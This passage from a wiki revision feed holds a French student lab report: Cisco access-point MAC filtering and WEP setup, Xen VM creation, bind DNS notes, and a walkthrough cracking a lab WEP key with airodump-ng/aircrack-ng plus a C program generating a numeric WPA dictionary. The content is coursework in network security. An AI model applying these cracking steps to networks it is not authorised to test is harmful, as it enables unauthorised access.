&lt;br /&gt;
Dans un autre terminal:&lt;br /&gt;
Je vais analyser mon fichier de capture pour casser la cles.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ls&lt;br /&gt;
aircrack-ng fcracotte06-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres quelque minutes on obtient la cles &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ]&lt;br /&gt;
Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;c) Cassage d'une cles WPA&amp;lt;/h4&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng --encrypt wpa mon0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 - creation d'un dictionaire :&lt;br /&gt;
code C:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
int main ()&lt;br /&gt;
{&lt;br /&gt;
int val=0;&lt;br /&gt;
for(val=0;val&amp;lt;99999999 ;val++)&lt;br /&gt;
{printf(&amp;quot;%08d\n&amp;quot;,val); }&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Compilation :&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
gcc -Wall Dictionnaire.c -o Dictionnaire&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création :&lt;br /&gt;
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
./Dictionnaire &amp;gt; Dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
mettre serveur messagerie &lt;br /&gt;
demander certificat&lt;br /&gt;
&lt;br /&gt;
securisation wifi &lt;br /&gt;
WPA-EAP&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23092</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23092"/>
				<updated>2015-11-20T09:52:19Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du point d’accès Cisco &amp;lt;/h5&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du Wifi sur l'eeePC &amp;lt;/h5&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
connexion à notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage systemd &lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Serveur DNS&lt;br /&gt;
modification du fichier /var/cache/bind option&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nano /etc/bind/named.conf.options &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   59  apt-get install vim strace tcpdump &lt;br /&gt;
   60  apt-get install host&lt;br /&gt;
   61  host -t ni love-in-the-world.space&lt;br /&gt;
   62  host -t any love-in-the-world.space&lt;br /&gt;
   68  vim named.conf.options &lt;br /&gt;
   69  cp db.local db.love-in-the-world&lt;br /&gt;
   70  cat named.conf.default-zones &lt;br /&gt;
   71  vim named.conf.local &lt;br /&gt;
   73  vim db.love-in-the-world &lt;br /&gt;
   service bind9 stop&lt;br /&gt;
   76  service bind9 start&lt;br /&gt;
   77  cat /var/log/daemon.log&lt;br /&gt;
   78  vim db.love-in-the-world &lt;br /&gt;
   service bind9 stop&lt;br /&gt;
   vim db.love-in-the-world &lt;br /&gt;
   service bind9 start&lt;br /&gt;
   cat /var/log/daemon.log&lt;br /&gt;
   cat /var/log/daemon.log&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie III - Installation de Debian sur les nouvelles machines &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie IV - Cassage d'une cles Wifi &amp;lt;/h2&amp;gt;&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Préparation &amp;lt;/h4&amp;gt;&lt;br /&gt;
- Instalation aircrack-ng&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install aircrack-ng firmware ralink&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
- Instalation du port usb-Wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install firmware ralink&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;b) Cassage d'une cles WEP &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je scan le reseaux Wifi: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J’identifie le ssid de cracotte06 et je met les donnée  dans un fichier nommé fcracotte06&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w fcracotte06&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La capture a donc commencé &lt;br /&gt;
&lt;br /&gt;
Dans un autre terminal:&lt;br /&gt;
Je vais analyser mon fichier de capture pour casser la cles.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ls&lt;br /&gt;
aircrack-ng fcracotte06-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres quelque minutes on obtient la cles &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ]&lt;br /&gt;
Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;c) Cassage d'une cles WPA&amp;lt;/h4&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng --encrypt wpa mon0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 - creation d'un dictionaire :&lt;br /&gt;
code C:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
int main ()&lt;br /&gt;
{&lt;br /&gt;
int val=0;&lt;br /&gt;
for(val=0;val&amp;lt;99999999 ;val++)&lt;br /&gt;
{printf(&amp;quot;%08d\n&amp;quot;,val); }&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Compilation :&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
gcc -Wall Dictionnaire.c -o Dictionnaire&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création :&lt;br /&gt;
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
./Dictionnaire &amp;gt; Dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
mettre serveur messagerie &lt;br /&gt;
demander certificat&lt;br /&gt;
&lt;br /&gt;
securisation wifi &lt;br /&gt;
WPA-EAP&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23082</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23082"/>
				<updated>2015-11-20T08:25:31Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du point d’accès Cisco &amp;lt;/h5&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du Wifi sur l'eeePC &amp;lt;/h5&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
connexion à notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
